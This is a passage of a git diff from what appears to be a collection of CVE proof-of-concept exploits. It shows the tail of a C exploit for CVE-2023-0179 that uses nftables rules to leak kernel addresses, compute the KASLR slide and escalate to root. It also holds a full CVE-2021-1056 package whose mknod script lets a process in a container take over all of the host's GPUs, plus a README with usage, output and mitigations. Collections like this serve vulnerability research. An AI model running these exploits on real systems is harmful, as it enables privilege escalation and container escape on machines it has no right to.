mnl_socket* nl = mnl_socket_open(NETLINK_NETFILTER); + if (mnl_socket_bind(nl, 0, MNL_SOCKET_AUTOPID) < 0) { + perror("[-] mnl_socket_bind"); + puts("[-] Check your CAP_NET_ADMIN capability"); + exit(EXIT_FAILURE); + } + + // Wait for local traffic to cool down + sleep(5); + + int seq = time(NULL); + if (create_table(nl, table_name, NFPROTO_NETDEV, &seq, NULL) == -1) { + perror("[-] Failed creating table"); + exit(EXIT_FAILURE); + } + printf("[+] Created table %s\n", table_name); + + struct unft_base_chain_param bp; + // NF_INET_PRE_ROUTING and NF_BR_LOCAL_IN shoud also work + bp.hook_num = NF_NETDEV_INGRESS; + bp.prio = INT_MIN; + if (create_chain(nl, table_name, base_chain_name, dev_name, NFPROTO_NETDEV, &bp, &seq, NULL)) { + perror("[-] Failed creating base chain"); + exit(EXIT_FAILURE); + } + printf("[+] Created base chain %s\n", base_chain_name); + + if (create_chain(nl, table_name, exploit_chain_name, dev_name, NFPROTO_NETDEV, NULL, &seq, NULL)) { + perror("[-] Failed creating exploit chain"); + exit(EXIT_FAILURE); + } + printf("[+] Created exploit chain %s\n", base_chain_name); + + if (create_set(nl, table_name, set_name, NFPROTO_NETDEV, &seq, NULL)) { + perror("[-] Failed creating set"); + exit(EXIT_FAILURE); + } + printf("[+] Created exploit set\n"); + + if (create_base_chain_rule_leak(nl, table_name, base_chain_name, NFPROTO_NETDEV, NULL, &seq)) { + perror("[-] Failed creating base chain rule"); + exit(EXIT_FAILURE); + } + printf("[+] Created base chain rule\n"); + + uint8_t offset = 19, len = 4, vlan_hlen = 4; + uint8_t ethlen = len - offset + len - VLAN_ETH_HLEN + vlan_hlen; + unsigned long found_addr; + unsigned long found_instr; + if (create_exploit_chain_rule_leak(nl, table_name, exploit_chain_name, NFPROTO_NETDEV, NULL, &seq, offset, len)) { + perror("[-] Failed creating base chain rule"); + return EXIT_FAILURE; + } + printf("[+] offset: %hhu & len: %hhu & ethlen = %hhu\n", offset, len, ethlen); + puts("[+] Successfully created exploit chain rule!"); + if (send_packet() == 0) { + system("nft list map netdev mytable myset12 | ./run.sh > reg.log"); + found_addr = read_from_file(0); + found_instr = read_from_file(1); + printf("[+] Found regs address: 0x%lx\n", found_addr); + printf("[+] Found instr address: 0x%lx\n", found_instr); + printf("[+] KASLR slide: 0x%lx\n", found_instr - INSTR_BASE); + system("nft delete table netdev mytable"); + } + + if (choice == LEAK_AND_PWN) { + printf("[+] Inserting the needle into address 0x%lx\n", found_addr); + sleep(5); + return pwn(nl, found_addr, found_instr); + } + return EXIT_SUCCESS; +} diff --git a/cve/linux-kernel/2023/yaml/CVE-2023-0179.yaml b/cve/linux-kernel/2023/yaml/CVE-2023-0179.yaml index 74ca113bb0cb1849ee5b28fd2b0ce967274569d1..df17326309b74815316b67c4f10f3c78d40f25af 100644 --- a/cve/linux-kernel/2023/yaml/CVE-2023-0179.yaml +++ b/cve/linux-kernel/2023/yaml/CVE-2023-0179.yaml @@ -1,23 +1,23 @@ -id: CVE-2023-0179 -source: https://github.com/TurtleARM/CVE-2023-0179-PoC -info: - name: Linux kernel是美国Linux基金会的开源操作系统Linux所使用的内核。 - severity: high - description: | - 在 Linux 内核的 Netfilter 子系统中发现一个缓冲区溢出漏洞。此问题可能允许堆栈和堆地址泄漏,并可能允许通过任意代码执行将本地权限提升给根用户。 - scope-of-influence: - Red Hat Enterprise Linux 9 - reference: - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0179 - - https://www.openwall.com/lists/oss-security/2023/01/13/2 - - https://patchwork.ozlabs.org/project/netfilter-devel/patch/20230111212251.193032-4-pablo@netfilter.org/ - - https://ubuntu.com/security/notices/USN-5856-1 - - https://ubuntu.com/security/notices/USN-5857-1 - - https://ubuntu.com/security/notices/USN-5858-1 - - https://ubuntu.com/security/notices/USN-5859-1 - classification: - cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H - cvss-score: 7.8 - cve-id: CVE-2023-0179 - cnvd-id: NONE +id: CVE-2023-0179 +source: https://github.com/TurtleARM/CVE-2023-0179-PoC +info: + name: Linux kernel是美国Linux基金会的开源操作系统Linux所使用的内核。 + severity: high + description: | + 在 Linux 内核的 Netfilter 子系统中发现一个缓冲区溢出漏洞。此问题可能允许堆栈和堆地址泄漏,并可能允许通过任意代码执行将本地权限提升给根用户。 + scope-of-influence: + Red Hat Enterprise Linux 9 + reference: + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0179 + - https://www.openwall.com/lists/oss-security/2023/01/13/2 + - https://patchwork.ozlabs.org/project/netfilter-devel/patch/20230111212251.193032-4-pablo@netfilter.org/ + - https://ubuntu.com/security/notices/USN-5856-1 + - https://ubuntu.com/security/notices/USN-5857-1 + - https://ubuntu.com/security/notices/USN-5858-1 + - https://ubuntu.com/security/notices/USN-5859-1 + classification: + cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 7.8 + cve-id: CVE-2023-0179 + cnvd-id: NONE tags: 缓冲区溢出,cve2023 \ No newline at end of file diff --git a/cve/nvidia/2021/CVE-2021-1056/README.md b/cve/nvidia/2021/CVE-2021-1056/README.md index ca9ccc4ace773c69ce7d0c86d0b046628c9fb30c..4e50d6c28c1a35c7700ffa08ee2b15d4024954dd 100644 --- a/cve/nvidia/2021/CVE-2021-1056/README.md +++ b/cve/nvidia/2021/CVE-2021-1056/README.md @@ -1,163 +1,163 @@ -# CVE-2021-1056 - -NVIDIA GPU Display Driver for Linux, all versions, contains a vulnerability in the kernel mode layer (nvidia.ko) in which it does not completely honor operating system file system permissions to provide GPU device-level isolation, which may lead to denial of service or information disclosure. - -Here demonstrates the vulnerability on GPU containers created by [nvidia-container-runtime](https://github.com/NVIDIA/nvidia-container-runtime). For a comprehensive understanding, check out the accompanying [official post](https://ubuntu.com/security/CVE-2021-1056) for in-depth details. - -## How it works - -By creating specific character device files an attacker in a GPU container(container created by `nvidia-container-runtime`) is able to get access to all GPU devices on the host. - -It also works on GPU pod created by `k8s-device-plugin` on kubernetes cluster. - - - -## Prerequisite - -* Docker 19.03 -* `nvidia-container-toolkit` - -* NVIDIA Driver 418.87.01 / 450.51.05 -* NVIDIA GPU Tesla V100 / TITAN V / Tesla K80 - -NOTE: refer to [NVIDIA Security Bulletin](https://nvidia.custhelp.com/app/answers/detail/a_id/5142), this vulnerability works on all GeForce, NVIDIA RTX/Quadro, NVS and Tesla series GPU, and all version drivers. - - - -## Usage - -* start a container with only 1 GPU card and mount - -```bash -$ docker run --gpus 1 -v $PWD:/CVE-2021-1056 -it tensorflow/tensorflow:1.13.2-gpu bash -``` - - - -* check gpu status **in container** - -```bash -# nvidia-smi -Sat Jan 9 07:21:03 2021 -+-----------------------------------------------------------------------------+ -| NVIDIA-SMI 450.51.05 Driver Version: 450.51.05 CUDA Version: 11.0 | -|-------------------------------+----------------------+----------------------+ -| GPU Name Persistence-M| Bus-Id Disp.A | Volatile Uncorr. ECC | -| Fan Temp Perf Pwr:Usage/Cap| Memory-Usage | GPU-Util Compute M. | -| | | MIG M. | -|===============================+======================+======================| -| 0 Tesla V100-PCIE... Off | 00000000:02:00.0 Off | 0 | -| N/A 27C P0 23W / 250W | 0MiB / 32510MiB | 0% Default | -| | | N/A | -+-------------------------------+----------------------+----------------------+ - -+-----------------------------------------------------------------------------+ -| Processes: | -| GPU GI CI PID Type Process name GPU Memory | -| ID ID Usage | -|=============================================================================| -| No running processes found | -+-----------------------------------------------------------------------------+ -``` - - - -* execute script **in container** - -```bash -# bash /CVE-2021-1056/main.sh -[INFO] init GPU num: 1 -[DEBUG] /dev/nvidia0 exists, skip -[DEBUG] successfully get /dev/nvidia1 -[DEBUG] successfully get /dev/nvidia2 -[DEBUG] successfully get /dev/nvidia3 -[DEBUG] delete redundant /dev/nvidia4 -[INFO] get extra 3 GPU devices from host -[INFO] current GPU num: 4 -[INFO] exec nvidia-smi: -Sat Jan 9 07:22:43 2021 -+-----------------------------------------------------------------------------+ -| NVIDIA-SMI 450.51.05 Driver Version: 450.51.05 CUDA Version: 11.0 | -|-------------------------------+----------------------+----------------------+ -| GPU Name Persistence-M| Bus-Id Disp.A | Volatile Uncorr. ECC | -| Fan Temp Perf Pwr:Usage/Cap| Memory-Usage | GPU-Util Compute M. | -| | | MIG M. | -|===============================+======================+======================| -| 0 Tesla V100-PCIE... Off | 00000000:02:00.0 Off | 0 | -| N/A 27C P0 23W / 250W | 0MiB / 32510MiB | 0% Default | -| | | N/A | -+-------------------------------+----------------------+----------------------+ -| 1 Tesla V100-PCIE... Off | 00000000:03:00.0 Off | 0 | -| N/A 30C P0 25W / 250W | 0MiB / 32510MiB | 0% Default | -| | | N/A | -+-------------------------------+----------------------+----------------------+ -| 2 Tesla V100-PCIE... Off | 00000000:82:00.0 Off | 0 | -| N/A 29C P0 25W / 250W | 0MiB / 32510MiB | 0% Default | -| | | N/A | -+-------------------------------+----------------------+----------------------+ -| 3 Tesla V100-PCIE... Off | 00000000:83:00.0 Off | 0 | -| N/A 28C P0 25W / 250W | 0MiB / 32510MiB | 0% Default | -| | | N/A | -+-------------------------------+----------------------+----------------------+ - -+-----------------------------------------------------------------------------+ -| Processes: | -| GPU GI CI PID Type Process name GPU Memory | -| ID ID Usage | -|=============================================================================| -| No running processes found | -+-----------------------------------------------------------------------------+ -``` - - - -* run a tensorflow demo **in container** to ensure all the GPUs can indeed be accessed - -```bash -# nohup python /CVE-2021-1056/tf_distr_demo.py > log 2>&1 & -# nvidia-smi -Sat Jan 9 18:58:23 2021 -+-----------------------------------------------------------------------------+ -| NVIDIA-SMI 450.51.05 Driver Version: 450.51.05 CUDA Version: 11.0 | -|-------------------------------+----------------------+----------------------+ -| GPU Name Persistence-M| Bus-Id Disp.A | Volatile Uncorr. ECC | -| Fan Temp Perf Pwr:Usage/Cap| Memory-Usage | GPU-Util Compute M. | -| | | MIG M. | -|===============================+======================+======================| -| 0 Tesla V100-PCIE... Off | 00000000:02:00.0 Off | 0 | -| N/A 32C P0 36W / 250W | 31117MiB / 32510MiB | 1% Default | -| | | N/A | -+-------------------------------+----------------------+----------------------+ -| 1 Tesla V100-PCIE... Off | 00000000:03:00.0 Off | 0 | -| N/A 33C P0 35W / 250W | 31117MiB / 32510MiB | 1% Default | -| | | N/A | -+-------------------------------+----------------------+----------------------+ -| 2 Tesla V100-PCIE... Off | 00000000:82:00.0 Off | 0 | -| N/A 33C P0 36W / 250W | 31117MiB / 32510MiB | 1% Default | -| | | N/A | -+-------------------------------+----------------------+----------------------+ -| 3 Tesla V100-PCIE... Off | 00000000:83:00.0 Off | 0 | -| N/A 32C P0 37W / 250W | 31117MiB / 32510MiB | 1% Default | -| | | N/A | -+-------------------------------+----------------------+----------------------+ - -+-----------------------------------------------------------------------------+ -| Processes: | -| GPU GI CI PID Type Process name GPU Memory | -| ID ID Usage | -|=============================================================================| -+-----------------------------------------------------------------------------+ -``` - - - -## How to prevent - -Recommended - -* Refer to the [NVIDIA Security Bulletin](https://nvidia.custhelp.com/app/answers/detail/a_id/5142) or to update the NVIDIA GPU driver - -Or - -* Add arg `--cap-drop MKNOD` to the `docker run` to forbid the `mknod` in containers +# CVE-2021-1056 + +NVIDIA GPU Display Driver for Linux, all versions, contains a vulnerability in the kernel mode layer (nvidia.ko) in which it does not completely honor operating system file system permissions to provide GPU device-level isolation, which may lead to denial of service or information disclosure. + +Here demonstrates the vulnerability on GPU containers created by [nvidia-container-runtime](https://github.com/NVIDIA/nvidia-container-runtime). For a comprehensive understanding, check out the accompanying [official post](https://ubuntu.com/security/CVE-2021-1056) for in-depth details. + +## How it works + +By creating specific character device files an attacker in a GPU container(container created by `nvidia-container-runtime`) is able to get access to all GPU devices on the host. + +It also works on GPU pod created by `k8s-device-plugin` on kubernetes cluster. + + + +## Prerequisite + +* Docker 19.03 +* `nvidia-container-toolkit` + +* NVIDIA Driver 418.87.01 / 450.51.05 +* NVIDIA GPU Tesla V100 / TITAN V / Tesla K80 + +NOTE: refer to [NVIDIA Security Bulletin](https://nvidia.custhelp.com/app/answers/detail/a_id/5142), this vulnerability works on all GeForce, NVIDIA RTX/Quadro, NVS and Tesla series GPU, and all version drivers. + + + +## Usage + +* start a container with only 1 GPU card and mount + +```bash +$ docker run --gpus 1 -v $PWD:/CVE-2021-1056 -it tensorflow/tensorflow:1.13.2-gpu bash +``` + + + +* check gpu status **in container** + +```bash +# nvidia-smi +Sat Jan 9 07:21:03 2021 ++-----------------------------------------------------------------------------+ +| NVIDIA-SMI 450.51.05 Driver Version: 450.51.05 CUDA Version: 11.0 | +|-------------------------------+----------------------+----------------------+ +| GPU Name Persistence-M| Bus-Id Disp.A | Volatile Uncorr. ECC | +| Fan Temp Perf Pwr:Usage/Cap| Memory-Usage | GPU-Util Compute M. | +| | | MIG M. | +|===============================+======================+======================| +| 0 Tesla V100-PCIE... Off | 00000000:02:00.0 Off | 0 | +| N/A 27C P0 23W / 250W | 0MiB / 32510MiB | 0% Default | +| | | N/A | ++-------------------------------+----------------------+----------------------+ + ++-----------------------------------------------------------------------------+ +| Processes: | +| GPU GI CI PID Type Process name GPU Memory | +| ID ID Usage | +|=============================================================================| +| No running processes found | ++-----------------------------------------------------------------------------+ +``` + + + +* execute script **in container** + +```bash +# bash /CVE-2021-1056/main.sh +[INFO] init GPU num: 1 +[DEBUG] /dev/nvidia0 exists, skip +[DEBUG] successfully get /dev/nvidia1 +[DEBUG] successfully get /dev/nvidia2 +[DEBUG] successfully get /dev/nvidia3 +[DEBUG] delete redundant /dev/nvidia4 +[INFO] get extra 3 GPU devices from host +[INFO] current GPU num: 4 +[INFO] exec nvidia-smi: +Sat Jan 9 07:22:43 2021 ++-----------------------------------------------------------------------------+ +| NVIDIA-SMI 450.51.05 Driver Version: 450.51.05 CUDA Version: 11.0 | +|-------------------------------+----------------------+----------------------+ +| GPU Name Persistence-M| Bus-Id Disp.A | Volatile Uncorr. ECC | +| Fan Temp Perf Pwr:Usage/Cap| Memory-Usage | GPU-Util Compute M. | +| | | MIG M. | +|===============================+======================+======================| +| 0 Tesla V100-PCIE... Off | 00000000:02:00.0 Off | 0 | +| N/A 27C P0 23W / 250W | 0MiB / 32510MiB | 0% Default | +| | | N/A | ++-------------------------------+----------------------+----------------------+ +| 1 Tesla V100-PCIE... Off | 00000000:03:00.0 Off | 0 | +| N/A 30C P0 25W / 250W | 0MiB / 32510MiB | 0% Default | +| | | N/A | ++-------------------------------+----------------------+----------------------+ +| 2 Tesla V100-PCIE... Off | 00000000:82:00.0 Off | 0 | +| N/A 29C P0 25W / 250W | 0MiB / 32510MiB | 0% Default | +| | | N/A | ++-------------------------------+----------------------+----------------------+ +| 3 Tesla V100-PCIE... Off | 00000000:83:00.0 Off | 0 | +| N/A 28C P0 25W / 250W | 0MiB / 32510MiB | 0% Default | +| | | N/A | ++-------------------------------+----------------------+----------------------+ + ++-----------------------------------------------------------------------------+ +| Processes: | +| GPU GI CI PID Type Process name GPU Memory | +| ID ID Usage | +|=============================================================================| +| No running processes found | ++-----------------------------------------------------------------------------+ +``` + + + +* run a tensorflow demo **in container** to ensure all the GPUs can indeed be accessed + +```bash +# nohup python /CVE-2021-1056/tf_distr_demo.py > log 2>&1 & +# nvidia-smi +Sat Jan 9 18:58:23 2021 ++-----------------------------------------------------------------------------+ +| NVIDIA-SMI 450.51.05 Driver Version: 450.51.05 CUDA Version: 11.0 | +|-------------------------------+----------------------+----------------------+ +| GPU Name Persistence-M| Bus-Id Disp.A | Volatile Uncorr. ECC | +| Fan Temp Perf Pwr:Usage/Cap| Memory-Usage | GPU-Util Compute M. | +| | | MIG M. | +|===============================+======================+======================| +| 0 Tesla V100-PCIE... Off | 00000000:02:00.0 Off | 0 | +| N/A 32C P0 36W / 250W | 31117MiB / 32510MiB | 1% Default | +| | | N/A | ++-------------------------------+----------------------+----------------------+ +| 1 Tesla V100-PCIE... Off | 00000000:03:00.0 Off | 0 | +| N/A 33C P0 35W / 250W | 31117MiB / 32510MiB | 1% Default | +| | | N/A | ++-------------------------------+----------------------+----------------------+ +| 2 Tesla V100-PCIE... Off | 00000000:82:00.0 Off | 0 | +| N/A 33C P0 36W / 250W | 31117MiB / 32510MiB | 1% Default | +| | | N/A | ++-------------------------------+----------------------+----------------------+ +| 3 Tesla V100-PCIE... Off | 00000000:83:00.0 Off | 0 | +| N/A 32C P0 37W / 250W | 31117MiB / 32510MiB | 1% Default | +| | | N/A | ++-------------------------------+----------------------+----------------------+ + ++-----------------------------------------------------------------------------+ +| Processes: | +| GPU GI CI PID Type Process name GPU Memory | +| ID ID Usage | +|=============================================================================| ++-----------------------------------------------------------------------------+ +``` + + + +## How to prevent + +Recommended + +* Refer to the [NVIDIA Security Bulletin](https://nvidia.custhelp.com/app/answers/detail/a_id/5142) or to update the NVIDIA GPU driver + +Or + +* Add arg `--cap-drop MKNOD` to the `docker run` to forbid the `mknod` in containers * Enable `security context` in kubernetes clusters when creating a pod \ No newline at end of file diff --git a/cve/nvidia/2021/CVE-2021-1056/main.sh b/cve/nvidia/2021/CVE-2021-1056/main.sh index 504871b786f1761357a85a9338e821920234db08..24bb7a2462278a2e7342acda5b9bdf3f8c1eca7b 100644 --- a/cve/nvidia/2021/CVE-2021-1056/main.sh +++ b/cve/nvidia/2021/CVE-2021-1056/main.sh @@ -1,42 +1,42 @@ -#!/usr/bin/env bash - -ROOT=$(cd $(dirname ${BASH_SOURCE[0]}) && pwd -P) -source "${ROOT}/util.sh" - -INIT_GPU_NUM=$(util::get_gpu_num) -util::log_info "init GPU num: $INIT_GPU_NUM" - -# get major number and minor number from a legal GPU -DEV=/dev/$(ls /dev | grep nvidia[0-9] | head -n 1) -DEV_NUMBER=$(printf "%d %d" $(stat --format "0x%t 0x%T" $DEV)) - -GPU_NO=0 -while : -do - # skip this no if device file already exists - if [ -c "/dev/nvidia$GPU_NO" ]; then - util::log_debug "/dev/nvidia$GPU_NO exists, skip" - GPU_NO=`expr $GPU_NO + 1` - continue - fi - - CURRENT_GPU_NUM=$(util::get_gpu_num) - - # create specify device file to trick cgroup - mknod -m 666 /dev/nvidia$GPU_NO c $DEV_NUMBER - - # break if have got all GPUs on the host - if [ $(util::get_gpu_num) == "$CURRENT_GPU_NUM" ]; then - util::log_debug "delete redundant /dev/nvidia$GPU_NO" - rm /dev/nvidia$GPU_NO - break - fi - - util::log_debug "successfully get /dev/nvidia$GPU_NO" - GPU_NO=`expr $GPU_NO + 1` -done - -util::log_info "get extra $(expr $CURRENT_GPU_NUM - $INIT_GPU_NUM) GPU devices from host" -util::log_info "current GPU num: $CURRENT_GPU_NUM" -util::log_info "exec nvidia-smi:" +#!/usr/bin/env bash + +ROOT=$(cd $(dirname ${BASH_SOURCE[0]}) && pwd -P) +source "${ROOT}/util.sh" + +INIT_GPU_NUM=$(util::get_gpu_num) +util::log_info "init GPU num: $INIT_GPU_NUM" + +# get major number and minor number from a legal GPU +DEV=/dev/$(ls /dev | grep nvidia[0-9] | head -n 1) +DEV_NUMBER=$(printf "%d %d" $(stat --format "0x%t 0x%T" $DEV)) + +GPU_NO=0 +while : +do + # skip this no if device file already exists + if [ -c "/dev/nvidia$GPU_NO" ]; then + util::log_debug "/dev/nvidia$GPU_NO exists, skip" + GPU_NO=`expr $GPU_NO + 1` + continue + fi + + CURRENT_GPU_NUM=$(util::get_gpu_num) + + # create specify device file to trick cgroup + mknod -m 666 /dev/nvidia$GPU_NO c $DEV_NUMBER + + # break if have got all GPUs on the host + if [ $(util::get_gpu_num) == "$CURRENT_GPU_NUM" ]; then + util::log_debug "delete redundant /dev/nvidia$GPU_NO" + rm /dev/nvidia$GPU_NO + break + fi + + util::log_debug "successfully get /dev/nvidia$GPU_NO" + GPU_NO=`expr $GPU_NO + 1` +done + +util::log_info "get extra $(expr $CURRENT_GPU_NUM - $INIT_GPU_NUM) GPU devices from host" +util::log_info "current GPU num: $CURRENT_GPU_NUM" +util::log_info "exec nvidia-smi:" nvidia-smi \ No newline at end of file diff --git a/cve/nvidia/2021/CVE-2021-1056/tf_distr_demo.py b/cve/nvidia/2021/CVE-2021-1056/tf_distr_demo.py index e662da3464a603bf549d6001e568c9ab2c2c0483..040afbf5024691bdbb7fe3d39509dbc6ce5f8f48 100644 --- a/cve/nvidia/2021/CVE-2021-1056/tf_distr_demo.py +++ b/cve/nvidia/2021/CVE-2021-1056/tf_distr_demo.py @@ -1,106 +1,106 @@ -# coding=utf-8 -from tensorflow.examples.tutorials.mnist import input_data -from tensorflow.python.client import device_lib - -mnist = input_data.read_data_sets("/tmp/data/", one_hot=True) - -import tensorflow as tf - -learning_rate = 0.001 -training_steps = 8250 -batch_size = 100 -display_step = 100 - -n_hidden_1 = 256 -n_hidden_2 = 256 -n_input = 784 -n_classes = 10 - -def _variable_on_cpu(name, shape, initializer): - with tf.device('/cpu:0'): - dtype = tf.float32 - var = tf.get_variable(name, shape, initializer=initializer, dtype=dtype) - return var - -def build_model(): - - def multilayer_perceptron(x, weights, biases): - layer_1 = tf.add(tf.matmul(x, weights['h1']), biases['b1']) - layer_1 = tf.nn.relu(layer_1) - - layer_2 = tf.add(tf.matmul(layer_1, weights['h2']), biases['b2']) - layer_2 = tf.nn.relu(layer_2) - - out_layer = tf.matmul(layer_2, weights['out']) + biases['out'] - return out_layer - - with tf.variable_scope('aaa'): - weights = { - 'h1': _variable_on_cpu('h1',[n_input, n_hidden_1],tf.random_normal_initializer()), - 'h2': _variable_on_cpu('h2',[n_hidden_1, n_hidden_2],tf.random_normal_initializer()), - 'out': _variable_on_cpu('out_w',[n_hidden_2, n_classes],tf.random_normal_initializer()) - } - biases = { - 'b1': _variable_on_cpu('b1',[n_hidden_1],tf.random_normal_initializer()), - 'b2': _variable_on_cpu('b2',[n_hidden_2],tf.random_normal_initializer()), - 'out': _variable_on_cpu('out_b',[n_classes],tf.random_normal_initializer()) - } - - pred = multilayer_perceptron(x, weights, biases) - - cost = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(logits=pred, labels=y)) - return cost,pred - - -def average_gradients(tower_grads): - average_grads = [] - for grad_and_vars in zip(*tower_grads): - grads = [] - for g,_ in grad_and_vars: - expanded_g = tf.expand_dims(g, 0) - grads.append(expanded_g) - grad = tf.concat(axis=0, values=grads) - grad = tf.reduce_mean(grad, 0) - v = grad_and_vars[0][1] - grad_and_var = (grad, v) - average_grads.append(grad_and_var) - return average_grads - - -with tf.Graph().as_default(), tf.device('/cpu:0'): - x = tf.placeholder("float", [None, n_input]) - y = tf.placeholder("float", [None, n_classes]) - tower_grads = [] - optimizer = tf.train.AdamOptimizer(learning_rate=learning_rate) - local_device_protos = device_lib.list_local_devices() - num_gpus = sum([1 for d in local_device_protos if d.device_type == 'GPU']) - with tf.variable_scope(tf.get_variable_scope()): - for i in xrange(num_gpus): - with tf.device('/gpu:%d' % i): - cost,pred = build_model() - tf.get_variable_scope().reuse_variables() - grads = optimizer.compute_gradients(cost) - tower_grads.append(grads) - - grads = average_gradients(tower_grads) - apply_gradient_op = optimizer.apply_gradients(grads) - train_op = apply_gradient_op - - init = tf.global_variables_initializer() - sess = tf.Session() - sess.run(init) - - for step in range(training_steps): - image_batch, label_batch = mnist.train.next_batch(batch_size) - _, cost_print = sess.run([train_op, cost], - {x:image_batch, - y:label_batch}) - - if step % display_step == 0: - print("step=%04d" % (step+1)+ " cost=" + str(cost_print)) - print("Optimization Finished!") - correct_prediction = tf.equal(tf.argmax(pred, 1), tf.argmax(y, 1)) - accuracy = tf.reduce_mean(tf.cast(correct_prediction, "float")) - with sess.as_default(): - print("Accuracy:", accuracy.eval({x: mnist.test.images, y: mnist.test.labels})) +# coding=utf-8 +from tensorflow.examples.tutorials.mnist import input_data +from tensorflow.python.client import device_lib + +mnist = input_data.read_data_sets("/tmp/data/", one_hot=True) + +import tensorflow as tf + +learning_rate = 0.001 +training_steps = 8250 +batch_size = 100 +display_step = 100 + +n_hidden_1 = 256 +n_hidden_2 = 256 +n_input = 784 +n_classes = 10 + +def _variable_on_cpu(name, shape, initializer): + with tf.device('/cpu:0'): + dtype = tf.float32 + var = tf.get_variable(name, shape, initializer=initializer, dtype=dtype) + return var + +def build_model(): + + def multilayer_perceptron(x, weights, biases): + layer_1 = tf.add(tf.matmul(x, weights['h1']), biases['b1']) + layer_1 = tf.nn.relu(layer_1) + + layer_2 = tf.add(tf.matmul(layer_1, weights['h2']), biases['b2']) + layer_2 = tf.nn.relu(layer_2) + + out_layer = tf.matmul(layer_2, weights['out']) + biases['out'] + return out_layer + + with tf.variable_scope('aaa'): + weights = { + 'h1': _variable_on_cpu('h1',[n_input, n_hidden_1],tf.random_normal_initializer()), + 'h2': _variable_on_cpu('h2',[n_hidden_1, n_hidden_2],tf.random_normal_initializer()), + 'out': _variable_on_cpu('out_w',[n_hidden_2, n_classes],tf.random_normal_initializer()) + } + biases = { + 'b1': _variable_on_cpu('b1',[n_hidden_1],tf.random_normal_initializer()), + 'b2': _variable_on_cpu('b2',[n_hidden_2],tf.random_normal_initializer()), + 'out': _variable_on_cpu('out_b',[n_classes],tf.random_normal_initializer()) + } + + pred = multilayer_perceptron(x, weights, biases) + + cost = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(logits=pred, labels=y)) + return cost,pred + + +def average_gradients(tower_grads): + average_grads = [] + for grad_and_vars in zip(*tower_grads): + grads = [] + for g,_ in grad_and_vars: + expanded_g = tf.expand_dims(g, 0) + grads.append(expanded_g) + grad = tf.concat(axis=0, values=grads) + grad = tf.reduce_mean(grad, 0) + v = grad_and_vars[0][1] + grad_and_var = (grad, v) + average_grads.append(grad_and_var) + return average_grads + + +with tf.Graph().as_default(), tf.device('/cpu:0'): + x = tf.placeholder("float", [None, n_input]) + y = tf.placeholder("float", [None, n_classes]) + tower_grads = [] + optimizer = tf.train.AdamOptimizer(learning_rate=learning_rate) + local_device_protos = device_lib.list_local_devices() + num_gpus = sum([1 for d in local_device_protos if d.device_type == 'GPU']) + with tf.variable_scope(tf.get_variable_scope()): + for i in xrange(num_gpus): + with tf.device('/gpu:%d' % i): + cost,pred = build_model() + tf.get_variable_scope().reuse_variables() + grads = optimizer.compute_gradients(cost) + tower_grads.append(grads) + + grads = average_gradients(tower_grads) + apply_gradient_op = optimizer.apply_gradients(grads) + train_op = apply_gradient_op + + init = tf.global_variables_initializer() + sess = tf.Session() + sess.run(init) + + for step in range(training_steps): + image_batch, label_batch = mnist.train.next_batch(batch_size) + _, cost_print = sess.run([train_op, cost], + {x:image_batch, + y:label_batch}) + + if step % display_step == 0: + print("step=%04d" % (step+1)+ " cost=" + str(cost_print)) + print("Optimization Finished!") + correct_prediction = tf.equal(tf.argmax(pred, 1), tf.argmax(y, 1)) + accuracy = tf.reduce_mean(tf.cast(correct_prediction, "float")) + with sess.as_default(): + print("Accuracy:", accuracy.eval({x: mnist.test.images, y: mnist.test.labels})) sess.close() \ No newline at end of file diff --git a/cve/nvidia/2021/CVE-2021-1056/util.sh b/cve/nvidia/2021/CVE-2021-1056/util.sh index edadd3aa99b99d1033832f9b548ffb59c48e046a..495da6a55bc71167acffa236a66c24fc16e89ffd 100644 --- a/cve/nvidia/2021/CVE-2021-1056/util.sh +++ b/cve/nvidia/2021/CVE-2021-1056/util.sh @@ -1,13 +1,13 @@ -#!/usr/bin/env bash - -function util::get_gpu_num() { - echo "$(nvidia-smi -L | wc -l)" -} - -function util::log_info() { - echo "[INFO] $1" -} - -function util::log_debug() { - echo "[DEBUG] $1" +#!/usr/bin/env bash + +function util::get_gpu_num() { + echo "$(nvidia-smi -L | wc -l)" +} + +function util::log_info() { + echo "[INFO] $1" +} + +function util::log_debug() { + echo "[DEBUG] $1" } \ No newline at end of file diff --git a/cve/nvidia/2021/yaml/CVE-2021-1056.yaml b/cve/nvidia/2021/yaml/CVE-2021-1056.yaml index 40d10b98d652d130214bbe641a4d6e75320bad06..2e7920f24d8cc85bc7425adb2380c2526d342d0b 100644 --- a/cve/nvidia/2021/yaml/CVE-2021-1056.yaml +++ b/cve/nvidia/2021/yaml/CVE-2021-1056.yaml @@ -1,23 +1,23 @@ -id: CVE-2021-1056 -source: https://github.com/pokerfaceSad/CVE-2021-1056 -info: - name: NVIDIA提供了针对Linux系统的官方显卡驱动程序,这些驱动程序包括内核模块、用户空间库和命令行工具,可以与Linux操作系统集成,提供高性能的图形加速和计算能力。 - severity: High - description: | - 漏洞CVE-2021-1056是NVIDIA GPU驱动程序与设备隔离相关的安全漏洞。当容器以非特权模式启动,攻击者利用这个漏洞,在容器中创建特殊的字符设备文件后,能够获取宿主机上所有GPU设备的访问权限。 - 适用于Linux的 NVIDIA GPU显示驱动程序,所有版本,都包含内核模式层 (nvidia.ko) 中的一个漏洞,在该漏洞中它不完全遵守操作系统文件系统权限以提供 GPU 设备级隔离,这可能会导致拒绝服务 或信息披露。 - scope-of-influence: - nvidia:gpu_driver:390≤390.141, nvidia:gpu_driver:450≤450.102.04, nvidia:gpu_driver:460≤460.32.03. - reference: - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-1056 - - https://nvidia.custhelp.com/app/answers/detail/a_id/5142 - - https://ubuntu.com/security/notices/USN-4689-1 - - https://ubuntu.com/security/notices/USN-4689-2 - - https://ubuntu.com/security/CVE-2021-1056 - - https://www.cvedetails.com/cve/CVE-2021-1056/?q=CVE-2021-1056 - classification: - cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:H - cvss-score: 7.1 - cve-id: CVE-2021-1056 - cwe-id: CWE-276 +id: CVE-2021-1056 +source: https://github.com/pokerfaceSad/CVE-2021-1056 +info: + name: 